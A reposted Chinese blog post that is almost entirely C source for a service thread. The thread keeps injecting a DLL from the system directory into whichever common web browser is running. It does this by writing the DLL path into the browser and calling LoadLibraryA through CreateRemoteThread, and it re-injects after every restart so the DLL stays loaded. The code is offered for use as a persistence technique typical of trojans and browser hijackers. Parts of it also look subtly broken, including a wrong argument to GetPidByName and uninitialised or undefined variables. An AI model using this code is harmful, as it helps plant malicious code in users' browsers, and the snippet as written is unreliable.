[转载]一种循环注入的思路

  信息来源：http://blog.csdn.net/brain_/
文章作者：brain_

我在写注入程序的时候，偶尔遇见过一些邪门儿的问题，比如挂在explorer上面不能运行，挂在其他的进程上面却很正常，为了能尽快地解决问题。我就犯懒设计了这个东西。因此也就不用怕由于进程的终止而导致dll文件的卸载：

DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
DWORD dwThreadID,pID,pPriID;
void *pRemoteThread;
HANDLE hProcess,hThread;
char pszLibFileName[MAX_PATH];
GetSystemDirectory(pszLibFileName,MAX_PATH);
strcat(pszLibFileName,"\\library.dll");
int cb = (1 + lstrlenA(pszLibFileName)) * sizeof(WCHAR);
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
   GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
EnableDebugPriv();
/*
maxthon.exe
firefox.exe
opera.exe
ttraveler.exe
*/
char *szBrowserName[5]=
{
  "maxthon.exe",
  "firefox.exe",
  "opera.exe",
  "ttraveler.exe",
  "iexplore.exe"
};
do
{
  for(int i=0;i<5;i++)
  {
  pID = GetPidByName(szBrowserName);
  if(pID != 0)
   i = 5;
  }

  if(pID == 0)
  {
  hThread = NULL;
  }
  else if((pID != 0)&&(hThread == NULL))
  {
  pPriID = pID;

  hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);

  if(!hProcess)
   return 0;

  pRemoteThread = VirtualAllocEx(hProcess,
        NULL,
        cb,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
  if(!pRemoteThread)
   return 0;

  if(!WriteProcessMemory(hProcess, pRemoteThread,
   (PVOID)pszLibFileName,
   cb,
   0))
   return 0;

  
  hThread = CreateRemoteThread(hProcess ,
       NULL,
       0,
       pfnStartAddr,
       pRemoteThread,
       0,
       &dwThreadID);

  CloseHandle(hProcess);
  }
  else if((pID != 0)&&(hThread != NULL)&&(pPriID!=pID))
  hThread = NULL;
  Sleep(100);
}
while(dwCurrState != SERVICE_STOP_PENDING && dwCurrState != SERVICE_STOPPED);
return 0;
}


这种模式能确保挂接的dll文件不会因为进程终止而卸载